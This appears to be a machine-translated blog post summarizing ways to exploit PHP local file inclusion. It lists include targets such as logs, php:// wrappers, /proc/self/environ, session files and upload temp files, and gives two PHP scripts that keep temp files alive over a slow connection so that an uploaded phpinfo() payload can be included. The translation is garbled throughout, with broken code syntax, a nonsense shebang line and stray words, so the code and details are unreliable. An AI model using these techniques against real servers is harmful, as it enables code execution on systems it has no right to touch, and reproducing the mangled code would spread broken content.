Summary of php Local File transfer sion exploitation methods

#! /Usr/bin/k4shifz

For more information, see php_lfi_rfc1867_temporary_files.pdf "target = _ blank> A foreign paper. To sum up the following ):

1. Include uploaded files, jpg, txt, rar, and other files.

2. contains various logs.

3. Use php wrapper, such as php: // input, php: // filter, and data.

4. Including/proc/self/environ. If you are not familiar with linux, you will be able to use it.

5. contains SESSION files, saved in php formatSess_SESSIONIDThe default locations are/tmp/and c:/windows/temp /.

6. contains files, caches, templates, and other files generated by php programs.

7. The tmp file is included. The format is/tmp/phpUs7MxA and c:/windows/temp/php3e. tmp.

(Brute-force cracking in Windows: up to four random characters in windows and six random characters in linux,Charset is 'A'-Z', a'-Z', 0 '-9 ′)

The last one is too troublesome and is enough. Don't take it for granted that tmp is related to move_uploaded_file (). In fact, php will automatically and immediately clear the tmp file when no move_uploaded_file () function is available, the method for keeping it on the server is slow connection.

Zookeeper --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Test the script that contains the temp file. The only advantage of this method is to send a package to any php file. php will generate the tmp file on the server first, and then the slow connection will prevent it from being deleted.
(The premise is that php. ini file_uploads = On, added in 5.3.1Max_file_uploadsBy default, up to 20 files can be uploaded at a time ):

<?
/* 20 temporary files will be generated if the time used is small */
Set_time_limit (0 );

$ Cmd = Content-Disposition: form-data; name = "edevil"; filename = "edevil. php"
Content-Type: zzz

<? Phpinfo ()?>
-- K4shifz_boundary
;
$ Fs = fsockopen (localhost, 80 );

/* You can also use HTTP/1.1 */
Fputs ($ fs, POST/test. php HTTP/1.0
Content-Type: multipart/form-data; boundary = k4shifz_boundary
Host: localhost
Content-Length: 999999

-- K4shifz_boundary
. $ Cmd );
While ($ fs)
{
Fputs ($ fs, $ cmd );
Sleep (1 );
}
Fclose ($ fs );
Exit;
?>

<?
/* It takes a long time to generate a temporary file */
Set_time_limit (0 );
$ Fs = fsockopen (localhost, 80 );
Fputs ($ fs, POST/test. php HTTP/1.0
Content-Type: multipart/form-data; boundary = k4shifz_boundary
Host: localhost
Content-Length: 999999

-- K4shifz_boundary
Content-Disposition: form-data; name = "edevil"; filename = "edevil. php"
Content-Type: zzz

<? Phpinfo ()?>
-- K4shifz_boundary --
);

While ($ fs)
{
Fputs ($ fs, AAAA );
Sleep (1 );
}

Fclose ($ fs );
Exit;
?>

In addition, according to Gary Daniel's blog in html "target = _ blank>, in php5.3.4, the null truncation has been fixed, and the stage will be replaced by about % 00.